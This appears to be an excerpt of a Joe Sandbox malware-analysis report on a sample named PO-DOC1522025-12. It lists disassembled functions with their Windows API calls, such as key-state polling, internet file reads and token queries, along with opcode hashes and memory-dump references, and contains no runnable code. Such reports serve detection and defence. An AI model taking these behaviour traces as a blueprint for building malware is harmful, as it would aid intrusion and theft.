Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 719f8172d98135b42445a9c04e8e4c760857b691f1e97dfa03cb851491d9cc99
Instruction ID: 738a4f78af8089a40e3b549cb8c7be5e98ad8a94728736a62a3a9e58922b4337
Opcode Fuzzy Hash: 719f8172d98135b42445a9c04e8e4c760857b691f1e97dfa03cb851491d9cc99
Instruction Fuzzy Hash: C1512875A002159FCB05DF65C881AAABBF5FF48314F088459E849AB3B2DB35ED51CB90

Function 001C8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 001C8F40
GetProcAddress.KERNEL32(00000000,?), ref: 001C8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 001C8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 001C9032
FreeLibrary.KERNEL32(00000000), ref: 001C9052

Part of subcall function 0015F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001B1043,?,7644E610), ref: 0015F6E6
Part of subcall function 0015F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0019FA64,00000000,00000000,?,?,001B1043,?,7644E610,?,0019FA64), ref: 0015F70D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: ce8d13a4050b1d7f0f5d254d45da252827499b6547bff89c8d586ae3e7067022
Instruction ID: 14fa0a7a4b2b2640e162c758637414073ca3406c4294e3050a6cd54f33537709
Opcode Fuzzy Hash: ce8d13a4050b1d7f0f5d254d45da252827499b6547bff89c8d586ae3e7067022
Instruction Fuzzy Hash: D2513534A05215DFCB05DF58C484DADBBB1FF69314B0980A9E80A9B762DB31ED86CB90

Function 001D6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 001D6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 001D6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001D6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001BAB79,00000000,00000000), ref: 001D6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001D6CC7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: fe51cd4b2c5088998e01b1a8b84e335c581797af07b7dfdbfba988c6a800d840
Instruction ID: d8c08e374064cc273af92447653a93efeabeffe638020d2ded08664b64c00f6e
Opcode Fuzzy Hash: fe51cd4b2c5088998e01b1a8b84e335c581797af07b7dfdbfba988c6a800d840
Instruction Fuzzy Hash: 0E41E635614114AFDB24CF28CC98FEA7BA5EB09350F15026AF999A73E0C771ED41DA80

Function 00172051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001720C3
_free.LIBCMT ref: 001720E3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ab8ae8fc89a6dfd9b0ce37625ec2355d6c357b6f443d29ba13e3b0529de5367d
Instruction ID: 511fc9405644cc3c8be0d579a4c476cf79d1799ccfefca453c055531b734c222
Opcode Fuzzy Hash: ab8ae8fc89a6dfd9b0ce37625ec2355d6c357b6f443d29ba13e3b0529de5367d
Instruction Fuzzy Hash: D041C472A002009FCB24DF78C881A5DB7F5FF99314F658569EA19EB352D731AD02CB91

Function 0015912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00159141
ScreenToClient.USER32(00000000,?), ref: 0015915E
GetAsyncKeyState.USER32(00000001), ref: 00159183
GetAsyncKeyState.USER32(00000002), ref: 0015919D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0c78fd69e341537e95090f969521461aee359297f8da3e9c0f3de2285a32b5f6
Instruction ID: cf3c5d04cdf6d6649ee2d0940100e0808dd794b2e223732ec346386997748ebf
Opcode Fuzzy Hash: 0c78fd69e341537e95090f969521461aee359297f8da3e9c0f3de2285a32b5f6
Instruction Fuzzy Hash: C6413D71A0861AEBDF199F64C884BEEB774FF15321F208226E835A62D0C7306954CB91

Function 001B3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001B38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 001B3922
TranslateMessage.USER32(?), ref: 001B394B
DispatchMessageW.USER32(?), ref: 001B3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B3966

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: ffc6c4c8c4aca65f6e6c2dc88fb38cecc2bc6f1aadd4c6e081a5b555d55c9a92
Instruction ID: 6169710d6442e2d840355b458237d5f9afc364e468d29a0b7d910f21c35d30de
Opcode Fuzzy Hash: ffc6c4c8c4aca65f6e6c2dc88fb38cecc2bc6f1aadd4c6e081a5b555d55c9a92
Instruction Fuzzy Hash: E131C970905342EEEB39CB34EC4CBF637A8AB15308F44456DE572C21A0EBB5A6A5CB51

Function 001BCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 001BCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFF2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: a00a9f6a2accf0f0509e227d28451ed72258b2f062fc82091ed4ffdac7eef2f9
Instruction ID: 409c3da3017ef487ff03cd6fdf6860466e65024d0afdf95f022c9b8384eeebdb
Opcode Fuzzy Hash: a00a9f6a2accf0f0509e227d28451ed72258b2f062fc82091ed4ffdac7eef2f9
Instruction Fuzzy Hash: 2A314A71A01206EFDB24DFA9C884ABBBBF9EB14351B1044AEF516D2140DB30EE41DBE0

Function 001A1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001A1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 001A19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 001A19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 001A19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 001A19E2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7eb3d221852dd1504be6157637e4e55cb36e725b6bb549375773801769f97274
Instruction ID: 7129e8bb277980fcbdf2716e68697975dffc3b8dae75db30350af627a778f020
Opcode Fuzzy Hash: 7eb3d221852dd1504be6157637e4e55cb36e725b6bb549375773801769f97274
Instruction Fuzzy Hash: 0C31BF76A0121AFFCB04CFA8CD99ADF3BB5EB05319F104629F921AB2D1C7709944CB90

Function 001D5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 001D5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 001D579D
_wcslen.LIBCMT ref: 001D57AF
_wcslen.LIBCMT ref: 001D57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 001D5816

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: b0c9cfdd61e5247263a3837554f9975e1e4e07b141d6b7c9246726ab53f41fb5
Instruction ID: 7f5c2fcafc1bd3fdbd5c267cfe95be05df1cf6572acf9133cb035c9fc1756304
Opcode Fuzzy Hash: b0c9cfdd61e5247263a3837554f9975e1e4e07b141d6b7c9246726ab53f41fb5
Instruction Fuzzy Hash: AE218071905618DADB209FA4CC85AEE7BB9FF14724F10821BE929EA2C0E7709985CF51

Function 001C0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 001C0951
GetForegroundWindow.USER32 ref: 001C0968
GetDC.USER32(00000000), ref: 001C09A4
GetPixel.GDI32(00000000,?,00000003), ref: 001C09B0
ReleaseDC.USER32(00000000,00000003), ref: 001C09E8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: dd68991fc65110b58f974b20f5167959b8c23c92481e12df93244074ea06b892
Instruction ID: 06abff5f4db7880bf46fd86864ab1dd2b96cab482a5d338267405614c1a7e305
Opcode Fuzzy Hash: dd68991fc65110b58f974b20f5167959b8c23c92481e12df93244074ea06b892
Instruction Fuzzy Hash: 5F216D35601214AFD704EF69D894AAEBBF9EF58700F04846DE84AD7762CB30EC44CB90

Function 0017CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0017CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017CDE9

Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0017CE0F
_free.LIBCMT ref: 0017CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017CE31

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a6d71c3c789eb4840dc6fa0122ea8ae842e790c6e3a578a66333b14603260342
Instruction ID: 2896922f7597f20aead732477500c8189541378f21f8869c9c66a1f78ee66317
Opcode Fuzzy Hash: a6d71c3c789eb4840dc6fa0122ea8ae842e790c6e3a578a66333b14603260342
Instruction Fuzzy Hash: EF0184726076267F272116BA6C88D7B6E7DEFC6BA1315812EF909C7201EF618D0291F0

Function 00159639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
SelectObject.GDI32(?,00000000), ref: 001596A2
BeginPath.GDI32(?), ref: 001596B9
SelectObject.GDI32(?,00000000), ref: 001596E2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b5017d9f9ce28acf6cf9b66b53fdaf7e7d58804ba2aeab299a8a7e63d4b62fdf
Instruction ID: 4c4216d9843a8d482bf6d12be46c74766313349f713eb1e277dcaa4787e630cd
Opcode Fuzzy Hash: b5017d9f9ce28acf6cf9b66b53fdaf7e7d58804ba2aeab299a8a7e63d4b62fdf
Instruction Fuzzy Hash: 07219270802346EFDB119F24EC197E97BA9BF20316F108616F930AA1B0D77458A9CFD1

Function 001A5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 001A5726
_memcmp.LIBVCRUNTIME ref: 001A5744
_memcmp.LIBVCRUNTIME ref: 001A5757
_memcmp.LIBVCRUNTIME ref: 001A576F
_memcmp.LIBVCRUNTIME ref: 001A5787

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 2daf661379563ecf5d41d4441b0b11d30eb02da1052cb25b747733112563a002
Instruction ID: 1eaab63fb4e31776fdbd0f8182779a1821fed5a5ac948935331f3bd3e3c22a90
Opcode Fuzzy Hash: 2daf661379563ecf5d41d4441b0b11d30eb02da1052cb25b747733112563a002
Instruction Fuzzy Hash: 8B01F969245A05FBD31851509D42FBB735FAB323B4F844025FD16BA341F720EE2182A0

Function 00172DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0016F2DE,00173863,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6), ref: 00172DFD
_free.LIBCMT ref: 00172E32
_free.LIBCMT ref: 00172E59
SetLastError.KERNEL32(00000000,00141129), ref: 00172E66
SetLastError.KERNEL32(00000000,00141129), ref: 00172E6F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 11bef305e79861f097167cdfa5eeb988d30b745a7be8f4db9664268ac17dbafe
Instruction ID: 365a92885f1505d1bea3dc619ccf034290e41947a028d632bdb814cb034c71b6
Opcode Fuzzy Hash: 11bef305e79861f097167cdfa5eeb988d30b745a7be8f4db9664268ac17dbafe
Instruction Fuzzy Hash: F901283220660077CA2367347C49D2B267DABE53B5B35C529F82DA32D3EF708C835060

Function 001A000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?,?,001A035E), ref: 001A002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?), ref: 001A0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0070

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3e1443d3ae695b44ecbc2305535419a29d1f26805d93b5360452a5e2387e7954
Instruction ID: d49d50932769904c480542d777875eff261b5772db05a32a7e48dfe1e1202699
Opcode Fuzzy Hash: 3e1443d3ae695b44ecbc2305535419a29d1f26805d93b5360452a5e2387e7954
Instruction Fuzzy Hash: D101F27A602205BFDB124F68DD04FAABBEEEF48391F104529F901D2210D770CD80DBA0

Function 001AE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 001AE997
QueryPerformanceFrequency.KERNEL32(?), ref: 001AE9A5
Sleep.KERNEL32(00000000), ref: 001AE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 001AE9B7
Sleep.KERNEL32 ref: 001AE9F3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: b32fc3f218b8e1b3138e89ae8873a42bcbb3fb547bc835d9c665b419d39f6e9b
Instruction ID: db1c8caa1e2102530ea7501b3dee6dddc860311284dbe74bec94bc30cec00fb1
Opcode Fuzzy Hash: b32fc3f218b8e1b3138e89ae8873a42bcbb3fb547bc835d9c665b419d39f6e9b
Instruction Fuzzy Hash: CA012D35C0262ADBCF04AFE5DC59AEEBBB8FF0A705F010556E502B2141CB309595CBA1

Function 001A10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cde9b4f19e60568cc8a9ed165c8b14532787b8bf578c5716537d771718e99ead
Instruction ID: ef5ae7a19fccac4a53a8549c562b17593cd2aff11d7541275e48e24880e3444c
Opcode Fuzzy Hash: cde9b4f19e60568cc8a9ed165c8b14532787b8bf578c5716537d771718e99ead
Instruction Fuzzy Hash: 46011D79102216FFDB114F75DC49A6A3B6EEF86364B144815FA45D7350DB31DC40DAA0

Function 001A0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001A0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001A0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001A0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001A0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001A1002

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
